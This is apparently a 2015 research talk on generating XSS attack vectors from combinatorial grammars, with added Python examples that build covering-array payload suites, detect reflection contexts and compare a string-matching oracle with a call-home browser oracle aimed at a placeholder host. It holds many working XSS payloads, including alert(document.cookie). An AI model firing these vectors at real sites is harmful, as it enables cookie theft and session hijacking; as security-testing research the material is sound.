Combinatorial XSS Attack Grammars
XSS Vectors for Everywhere
Bernhard Garn
SBA Research
April 10, 2015, SBA Research, Vienna
Outline
Introduction
  ◦ XSS
  ◦ Input parameter modelling
  ◦ Challenges
Evolution of grammars
  ◦ Global grammars
  ◦ Subgrammars
Brief note about oracles
2/22
Overview of Cross-Site-Scripting (XSS)
XSS vulnerabilities are caused by insufficient input sanitizing/parsing of parameter values of web applications.
• XSS remains one of the top vulnerabilities in the OWASP Top 10 Web Application Security Risks:
  ◦ 2010: 2nd
  ◦ 2013: 3rd
Threat: Execution of malicious JavaScript in the victim's browser!
3/22
Testing overview – bird's eye view
Diagram: Model → Test suite generator → Test suite → Test case execution (against the SUT) → Check output (against the Policy) → PASS / FAIL
4/22
Cross-Site-Scripting (XSS)
Scope: We focus on reflected and stored XSS
Example: The response sent from a server contains parts of the submitted request URL, reflected identically in the body
Goal: Make injected JavaScript executable!
• High-quality XSS vectors are of utmost importance to find/reveal vulnerabilities!
• Various generation methods (fuzzing, manually crafted lists, learning approaches, CT = combinatorial testing)
5/22
Increase in web-apps: injection possibilities everywhere!
6/22
Structure of an XSS Attack Vector
Valid URLs vs Attack Vectors
• Normal case: http://www.foo.com/error.php?msg=hello
• Attacker injects client-side script in parameter msg: http://www.foo.com/error.php?msg=<script>alert(1)</script>
Sample of XSS attack vectors
<src> onclick ''"alert(\"hacked\")"</src>
<script>' onclick alert(document.cookie)</script>
Input Parameter Model
• Parameters ⇒ parts of the URL
• Parameter value selection: input parameter modelling via categories
Combinatorial form of an XSS attack vector
AV := (parameter_1, parameter_2, . . . , parameter_k)
7/22
Challenges
Model creation can be considered as a multi-objective optimization problem
• Network latency
• Avoidance of DoSing the SUT
• Sizes of the arrays (CAN, the covering array number)
Aim:High quality, highly diverse attack vectors
8/22
Resulting Test Vectors
Generation parameters:
• Class of array (MCA, mixed-level covering array)
  ◦ Algorithms (IPO family)
  ◦ ACTS (courtesy of NIST)
  ◦ Thank you very much!
• Strength t
• Constraint solver
• New/extend/base choice (corresponds to modelling)
• Prioritization
Yields files with XSS attack vectors, one attack vector per line, corresponding to rows in the arrays.
9/22
Example
 #   array row (11 parameter values)      attack vector
 1   1, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2      //-- onMouseOver( </script>
 2   2, 3, 3, 3, 3, 3, 1, 3, 3, 3, 3      <script> //"; onError( ") <</script>
 3   3, 1, 4, 1, 1, 1, 1, 1, 4, 1, 4      <<script>// '; onLoad( ')</script>">
 4   4, 2, 5, 3, 1, 2, 1, 3, 5, 1, 5      <scr<script>ipt> "> onLoad( ;\>
 5   5, 3, 6, 1, 2, 3, 1, 1, 6, 2, 6      <script '>onMouseOver( "> "\>
 6   6, 1, 7, 2, 3, 1, 1, 2, 7, 3, 7      <img '"> onError( '> '\>
 7   7, 2, 8, 1, 3, 2, 1, 1, 8, 3, 8      <IMG "'>onError( < >
 8   8, 3, 9, 2, 1, 3, 1, 2, 9, 1, 9      <SCRIPT/XSS ">> onLoad( <<>>
 9   9, 1, 10, 3, 2, 1, 1, 3, 10, 2, 1    <'>> onMouseOver( ; //
10   10, 3, 11, 1, 3, 1, 1, 3, 11, 1, 2   << \"; onError( // </script>
11   11, 1, 12, 2, 1, 2, 1, 1, 1, 2, 3    </TITLE> onLoad( ) <</script>
12   12, 3, 13, 3, 3, 3, 1, 2, 2, 3, 4    <INPUT TYPE="IMAGE" / onError( </script>">
13   13, 1, 14, 1, 2, 1, 1, 2, 3, 1, 5    <LINK REL="stylesheet"\onMouseOver( ")\>
14   14, 2, 1, 2, 3, 2, 1, 3, 4, 2, 6     ' '><script> '; onError( ') "\>
15   15, 3, 2, 1, 1, 3, 1, 1, 5, 3, 7     ''><script> //--onLoad( ; '\>
16   1, 1, 3, 3, 1, 1, 2, 2, 6, 1, 8      //"; onLoad(<1> ">>
17   2, 2, 4, 1, 2, 2, 2, 3, 7, 2, 9      <script> // '; onMouseOver( <1> '> >>
18   3, 3, 5, 2, 3, 3, 2, 2, 8, 3, 1      <<script> "> onError( <1><
19   4, 1, 6, 3, 3, 1, 2, 1, 9, 3, 2      <scr<script>ipt>'> onError(<1><< </script>
20   5, 2, 7, 1, 1, 2, 2, 2, 10, 1, 3     <script '">onLoad( <1> ;//<</script>
10/22
Definition: pos vecs
The pos vecs (positive vectors) of a test suite are the attack vectors the oracle reports as successful. In the example suite above these are rows 3, 6, 9, 11, 14, 15 and 16:
 3   3, 1, 4, 1, 1, 1, 1, 1, 4, 1, 4      <<script>// '; onLoad( ')</script>">
 6   6, 1, 7, 2, 3, 1, 1, 2, 7, 3, 7      <img '"> onError( '> '\>
 9   9, 1, 10, 3, 2, 1, 1, 3, 10, 2, 1    <'>> onMouseOver( ; //
11   11, 1, 12, 2, 1, 2, 1, 1, 1, 2, 3    </TITLE> onLoad( ) <</script>
14   14, 2, 1, 2, 3, 2, 1, 3, 4, 2, 6     ' '><script> '; onError( ') "\>
15   15, 3, 2, 1, 1, 3, 1, 1, 5, 3, 7     ''><script> //--onLoad( ; '\>
16   1, 1, 3, 3, 1, 1, 2, 2, 6, 1, 8      //"; onLoad(<1> ">>
11/22
Evaluation of grammars – criteria
• Test suite size
• ER := (# pos vecs) / (# test suite)    (1)
• Simple t-way combination coverage of passing tests (CCM tool)
• Correlation of parameter values and specific sanitizing functions for input checking
• Data mining / machine learning
Recent results: see our contribution to IWCT 2015
12/22
Milestones in the Grammar Development
Global grammars
• Global = generic attack grammars for XSS
• Publications:
  ◦ Proof of Concept [AST 2014]
  ◦ Global grammar G [JAMAICA 2014]
  ◦ Global grammar constrained G_c [IWCT 2015]
Subgrammars [UNPUBLISHED]
• Optimized grammars to attack specific contexts in an HTML page
• Multiple refinement iterations
13/22
AST 2014
J. Bozic, D. E. Simos, F. Wotawa
• Inception of attack pattern + CT for Security Testing
• Important differences: generation, structure and execution of test cases
• Algorithm: IPOG
• Sizes of attack suites:
  ◦ t = 2: 114
  ◦ t = 3: 1031
  ◦ t = 4: 8332
Grammar: MCA(t, 12, (1, 1, 1, 1, 3, 3, 6, 9, 9, 10, 10, 10))
FOBRACKET(1) ::= <
TAG(10) ::= img | frame | src | script | body | HEAD | ...
FCBRACKET(1) ::= >
QUOTE1(3) ::= ' | " | null
SPACE(9) ::= \n | \t | \r | \r\n | \a | \b | \c | ...
EVENT(10) ::= onclick | onmouseover | onerror | ...
SPACE2(9) ::= \n | \t | \r | \r\n | \a | \b | \c | ...
QUOTE2(3) ::= ' | " | null
PAYLOAD(6) ::= alert(1) | alert(0) | ...
LOBRACKET(1) ::= </
CLOSINGTAG(10) ::= img | frame | src | script | body | ...
LCBRACKET(1) ::= >
Constraint: TAG = CLOSINGTAG
14/22
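Added example, not the speakers' tool (the talk used NIST ACTS with IPOG): a greedy t-way covering-array generator over a cut-down version of the AST 2014 grammar above, honouring the slide's TAG = CLOSINGTAG constraint and rendering every row of the array as one attack vector, exactly the "one attack vector per line" output described on slide 9. The value lists are abbreviated by us, and the greedy one-row-at-a-time strategy is a stand-in for IPOG that yields larger arrays; what it does show is that only constraint-realisable interactions define coverage, so a constraint shrinks the suite rather than leaving holes in it.

```python
"""Grammar -> mixed-level covering array -> XSS attack vectors (added example).

Not the speakers' code.  Greedy t-way covering array over an abbreviated
AST 2014 grammar with the slide's constraint TAG = CLOSINGTAG.
"""
from itertools import combinations, product

# Abbreviated grammar (parameter name, values); the slide lists more values.
GRAMMAR = [
    ("FOBRACKET", ["<"]),
    ("TAG", ["img", "script", "body"]),
    ("FCBRACKET", [">"]),
    ("QUOTE1", ["'", '"', ""]),
    ("SPACE", [" ", "\t", "\n"]),
    ("EVENT", ["onclick", "onmouseover", "onerror"]),
    ("SPACE2", [" ", "\t"]),
    ("QUOTE2", ["'", '"', ""]),
    ("PAYLOAD", ["alert(1)", "alert(0)"]),
    ("LOBRACKET", ["</"]),
    ("CLOSINGTAG", ["img", "script", "body"]),
    ("LCBRACKET", [">"]),
]
LEVELS = [len(values) for _, values in GRAMMAR]   # v_i per parameter
TAG, CLOSINGTAG = 1, 10                           # positions used by the constraint


def tag_matches_closing(row):
    """Constraint from the slide: TAG = CLOSINGTAG."""
    return row[TAG] == row[CLOSINGTAG]


def interactions(row, t):
    """All t-way (positions, values) interactions that one row covers."""
    return {(ps, tuple(row[p] for p in ps)) for ps in combinations(range(len(row)), t)}


def covering_array(levels, t, constraint=lambda row: True):
    """Greedy t-way covering array over constraint-valid rows.

    Enumerates every valid full row (fine for a demo; IPOG scales better), then
    repeatedly picks the row covering the most still-uncovered interactions.
    Interactions no valid row realises (e.g. TAG=img with CLOSINGTAG=script)
    never enter the target set, so the constraint shrinks the array.
    """
    candidates = [r for r in product(*(range(v) for v in levels)) if constraint(r)]
    covers = {r: interactions(r, t) for r in candidates}
    uncovered = set().union(*covers.values())
    rows = []
    while uncovered:
        best = max(candidates, key=lambda r: len(covers[r] & uncovered))
        rows.append(best)
        uncovered -= covers[best]
    return rows


def covers_all(rows, levels, t, constraint=lambda row: True):
    """Check: every constraint-realisable t-way interaction appears in some row."""
    wanted = set()
    for r in product(*(range(v) for v in levels)):
        if constraint(r):
            wanted |= interactions(r, t)
    got = set().union(*(interactions(r, t) for r in rows))
    return wanted <= got


def render(row):
    """Concatenate the chosen grammar values into one attack vector string."""
    return "".join(GRAMMAR[i][1][v] for i, v in enumerate(row))


def attack_vectors(t=2):
    """One attack vector per array row, as the generation pipeline emits them."""
    return [render(r) for r in covering_array(LEVELS, t, tag_matches_closing)]


if __name__ == "__main__":
    for vector in attack_vectors(2):
        print(repr(vector))
```

Dropping the constraint (call covering_array(LEVELS, 2) without it) makes pairs such as TAG=img with CLOSINGTAG=script coverage targets again, which is why the constrained grammar G_c in the IWCT 2015 comparison later in the talk produces smaller suites than G for the same strength.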
Jamaica 2014
B. Garn, I. Kapsalis, D. E. Simos, S. Winkler
• Configuration: MCA(t, 11, (3, 3, 3, 3, 3, 3, 9, 11, 14, 15, 23))
  ◦ 11 parameters
  ◦ whitespace modeling
  ◦ no constraints
• Algorithm: IPOG
• Comparison of tools (ZAP, Burp)
• Sizes of attack suites:
  ◦ t = 2: 345
  ◦ t = 3: 4875
  ◦ t = 4: 54706
Grammar G
JSO(15) ::= <script> | <img | ...
WS1(3) ::= tab | space | ...
INT(14) ::= "'; | ">> | ...
WS2(3) ::= tab | space | ...
EVH(3) ::= onLoad( | onError( | ...
WS3(3) ::= tab | space | ...
PAY(23) ::= alert('XSS') | ONLOAD=alert('XSS') | ...
WS4(3) ::= tab | space | ...
PAS(11) ::= ') | '> | ...
WS5(3) ::= tab | space | ...
JSE(9) ::= </script> | > | ...
15/22
IWCT 2015
J. Bozic, B. Garn, D. E. Simos, F. Wotawa
• Configuration: MCA(t, 11, (3, 3, 3, 3, 3, 3, 9, 11, 14, 15, 23))
  ◦ 11 parameters
  ◦ whitespace modeling
  ◦ CONSTRAINTS
• Algorithm: IPOG, IPOG-F
• Comparison of algorithms
Some constraints of G_c
(JSO=5) => (JSE=5 || JSE=6 || JSE=7 || JSE=8 || JSE=9)
(EVH=1) => (PAY=12 || PAY=14 || PAY=17 || PAY=18 || PAY=19)
(WS1=WS2 && WS2=WS3 && WS3=WS4 && WS4=WS5)
Table: Different sizes of test suites
Str.   G (IPOG)   G (IPOG-F)   G_c (IPOG)   G_c (IPOG-F)
2         345         345          250           252
3        4875        4830         1794          2012
4       53706       53130         8761          9760
16/22
Subgrammars [UNPUBLISHED]
• Can be thought of as “specific attacks”
• From 10 to 4 to 3 subgrammars (including new constraints each):
  ◦ inside element
  ◦ inside attribute
  ◦ inside JavaScript
• Parameter values specific to the context of the subgrammar
• Evaluation pending, so far highly effective
17/22
10 Subgrammars
@element
sg1:  MCA(t, 8, (2, 6, 5, 3, 2, 5, 6, 3))
sg2:  MCA(t, 12, (2, 6, 5, 3, 2, 1, 2, 5, 3, 6, 3, 3))
sg3:  MCA(t, 15, (2, 5, 3, 2, 2, 2, 5, 3, 1, 1, 2, 6, 1, 3, 3))
sg10: MCA(t, 9, (2, 2, 2, 5, 4, 1, 6, 4, 3))
@attribute
sg4:  MCA(t, 7, (4, 3, 3, 2, 5, 6, 3))
sg5:  MCA(t, 8, (4, 3, 2, 5, 3, 6, 3, 3))
@JavaScript
sg6:  MCA(t, 3, (1, 2, 6))
sg7:  MCA(t, 4, (4, 2, 5, 6))
sg8:  MCA(t, 5, (4, 3, 1, 6, 1))
sg9:  MCA(t, 3, (2, 6, 2))
18/22
3 Subgrammars
@element
SG01: MCA(t, 5, (3, 3, 7, 3, 7))
Parameters: delimiter01, closing-angle-bracket, opening-tag, payload, closing-tag
Constraints (excerpt): opening-tag=2 => closing-tag=2
@attribute
SG02: MCA(t, 4, (3, 6, 3, 6))
Parameters: delim01, attribute, payload, delim02
Constraints (excerpt): (delim01=1) => (delim02=1 || delim02=3)
@JavaScript
SG03: MCA(t, 3, (3, 3, 3))
Parameters: delim03, payload, delim04
Constraints (excerpt): (delim03=3) => (delim04=3)
19/22
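Added example, not the speakers' code: before a context-specific subgrammar can be fired, one has to know where the parameter is reflected. The block below sends a unique probe value (PROBE, our choice) and, on a constructed response, uses Python's standard-library HTMLParser to classify each reflection as element content, attribute value or JavaScript, reports the delimiter a vector from that subgrammar must break out of (the attribute quote, or the JavaScript string quote), and maps the context to SG01/SG02/SG03 from the slide. The JavaScript string heuristic and the comment case are ours; the slide's three subgrammars do not cover comments.

```python
"""Find the injection context of a reflected probe and pick the subgrammar.

Added example, not the speakers' code.  SAMPLE_RESPONSE and PROBE are
constructed; SG01..SG03 are the subgrammar names from the slide.
"""
import re
from html.parser import HTMLParser

PROBE = "zq7xss9k"   # unique, harmless marker sent as the parameter value

# Constructed server response reflecting the probe in four different contexts.
SAMPLE_RESPONSE = (
    "<html><body>"
    '<input type="text" name="q" value="zq7xss9k">'
    "<a href='/s?q=zq7xss9k'>again</a>"
    '<script>var q = "zq7xss9k"; track(q);</script>'
    "<p>Results for zq7xss9k</p>"
    "</body></html>"
)

SUBGRAMMAR = {"element": "SG01", "attribute": "SG02", "javascript": "SG03"}


def attr_quote(raw_tag, attr_name):
    """Quote that opens attr_name's value in the raw start tag; None if unquoted."""
    pattern = r"(?<![\w-])%s\s*=\s*([\"']?)" % re.escape(attr_name)
    m = re.search(pattern, raw_tag, re.I)
    if not m:
        return None
    return m.group(1) or None


def js_string_delim(prefix):
    """Heuristic: an odd number of unescaped quotes before the probe means
    the probe sits inside a string literal delimited by that quote."""
    prefix = prefix.replace("\\'", "").replace('\\"', "")
    for q in ('"', "'"):
        if prefix.count(q) % 2 == 1:
            return q
    return None


class ContextFinder(HTMLParser):
    """Records (context, attribute name or None, delimiter or None) per reflection."""

    def __init__(self, probe):
        super().__init__(convert_charrefs=True)
        self.probe = probe
        self.in_script = False
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True           # parser switches to CDATA mode for us
        raw = self.get_starttag_text()
        for name, value in attrs:
            if value and self.probe in value:
                self.hits.append(("attribute", name, attr_quote(raw, name)))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.probe not in data:
            return
        if self.in_script:
            before = data[:data.index(self.probe)]
            self.hits.append(("javascript", None, js_string_delim(before)))
        else:
            self.hits.append(("element", None, None))

    def handle_comment(self, data):
        if self.probe in data:
            self.hits.append(("comment", None, None))   # not covered by SG01..SG03


def find_contexts(html, probe=PROBE):
    finder = ContextFinder(probe)
    finder.feed(html)
    finder.close()
    return finder.hits


def plan(html, probe=PROBE):
    """(context, subgrammar or None, delimiter) for every reflection of the probe."""
    return [(ctx, SUBGRAMMAR.get(ctx), delim) for ctx, _, delim in find_contexts(html, probe)]


if __name__ == "__main__":
    for ctx, attr, delim in find_contexts(SAMPLE_RESPONSE):
        print(ctx, attr, repr(delim), "->", SUBGRAMMAR.get(ctx))
```

The delimiter is what the delim01/delim03 parameters of SG02 and SG03 have to supply: a probe landing in href='...' needs a single quote to break out, one in a double-quoted JavaScript string needs a double quote, and an unquoted attribute needs only whitespace, which is why those subgrammars carry delimiter parameters and constraints tying the opening and closing delimiter together.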
Oracle Consideration
• Reflection oracle
  ◦ via string matching
  ◦ false positives, false negatives
  ◦ tools seem not to agree
• Browser oracle
  ◦ zero false positives (!)
A change of oracle might require a change of some parameters/parameter values
20/22
Change of payload
• Reflection oracle
  ◦ possible parameter values: alert('1'), alert(document.cookie)
  ◦ any malicious code possible
• Browser oracle
  ◦ at this location the payload calls home
  ◦ coordination with logging infrastructure
Testing with different oracles can require re-generation of attack suites
21/22
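Added example, not the speakers' code, for the two oracle slides: a string-matching reflection oracle beside a call-home browser oracle, run on three constructed responses and one constructed access-log line. Row 1 is reflected verbatim inside an HTML comment (string matching says positive, the browser never executes it: a false positive); row 2 is reflected lower-cased by the server (string matching misses it, the browser fires: a false negative); row 3 is escaped and harmless. The browser-oracle payload carries the suite row id so a hit in the log maps back to a row, which is the coordination with the logging infrastructure the slide mentions; ORACLE_HOST and the log format are assumptions. ER from equation (1) on slide 12 is computed at the end.

```python
"""Reflection oracle vs browser oracle on one small suite, plus ER.

Added example, not the speakers' code.  SUITE, RESPONSES, CALL_HOME_LOG
and ORACLE_HOST are constructed or assumed.
"""
from urllib.parse import parse_qs, urlparse

ORACLE_HOST = "oracle.example"          # hypothetical call-home host we control

# Tiny suite: row id -> attack vector with the reflection-oracle payload alert(1).
SUITE = {
    1: "<script>alert(1)</script>",
    2: "<IMG SRC=x onerror=alert(1)>",
    3: "<img src=x onerror=alert(1)>",
}

# Constructed responses of the SUT to the three vectors.
RESPONSES = {
    1: "<!-- debug: q=<script>alert(1)</script> --><p>No results</p>",  # verbatim, but inert inside a comment
    2: "<p>You searched for <img src=x onerror=alert(1)></p>",           # server lower-cases: still executes
    3: "<p>You searched for &lt;img src=x onerror=alert(1)&gt;</p>",     # properly escaped: harmless
}

# Constructed access-log line from ORACLE_HOST for the browser-oracle run
# (same rows, payload swapped by browser_suite()); only row 2 phoned home.
CALL_HOME_LOG = [
    '10.0.0.5 - - [10/Apr/2015:14:02:11 +0200] "GET /hit?row=2 HTTP/1.1" 200 43',
]


def browser_payload(row_id):
    """Browser-oracle payload: call home with the row id instead of alert()."""
    return "new Image().src='http://%s/hit?row=%d'" % (ORACLE_HOST, row_id)


def browser_suite(suite):
    """Re-generate the suite for the browser oracle: swap the PAY value only."""
    return {rid: vec.replace("alert(1)", browser_payload(rid)) for rid, vec in suite.items()}


def reflection_oracle(vector, body):
    """String matching: is the vector reflected identically in the response body?"""
    return vector in body


def browser_oracle(log_lines):
    """Row ids whose call-home request reached our log; execution is proven."""
    hits = set()
    for line in log_lines:
        target = line.split('"')[1].split()[1]          # '/hit?row=2' from 'GET /hit?row=2 HTTP/1.1'
        params = parse_qs(urlparse(target).query)
        if "row" in params:
            hits.add(int(params["row"][0]))
    return hits


def run_suite(suite, responses, log_lines):
    """row id -> (reflection verdict, browser verdict)."""
    executed = browser_oracle(log_lines)
    return {rid: (reflection_oracle(vec, responses[rid]), rid in executed)
            for rid, vec in suite.items()}


def classify(results):
    """Rows where string matching disagrees with the browser: (false positives, false negatives)."""
    fp = [rid for rid, (refl, exe) in results.items() if refl and not exe]
    fn = [rid for rid, (refl, exe) in results.items() if exe and not refl]
    return fp, fn


def er(pos_vecs, suite_size):
    """ER := # pos vecs / # test suite, equation (1) on slide 12."""
    return pos_vecs / suite_size


if __name__ == "__main__":
    res = run_suite(SUITE, RESPONSES, CALL_HOME_LOG)
    print("false positives / false negatives of string matching:", classify(res))
    print("ER (reflection) =", er(sum(r for r, _ in res.values()), len(SUITE)))
    print("ER (browser)    =", er(sum(b for _, b in res.values()), len(SUITE)))
```

Both oracles report ER = 1/3 here, yet they disagree on which row is the positive one; this is why suite size and ER alone do not settle the comparison and why the slide says a change of oracle can force re-generation, since the browser-oracle payload changes the PAY parameter of every row.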
Conclusion
• Everything shown is completely scripted (i.e. automated)!
Thank you very much for your attention!
Questions?
22/22